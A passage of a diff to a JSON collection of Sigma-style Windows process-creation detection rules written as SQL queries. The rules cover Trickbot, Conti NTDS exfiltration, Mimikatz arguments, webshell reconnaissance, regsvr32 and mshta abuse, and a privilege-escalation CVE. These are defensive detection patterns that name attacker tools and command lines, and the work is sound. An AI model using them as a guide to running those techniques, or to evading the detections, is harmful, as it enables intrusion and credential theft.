CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": 
"proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "status": "test", + "description": 
"Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", 
"status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + 
"attack.collection", + "attack.t1560" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "UAC Bypass Using 
IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", - "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.execution", - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), 
Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE 
'\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_webshell_detection.yml" - }, - { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' 
ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR 
CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE 
'%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": 
"5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine 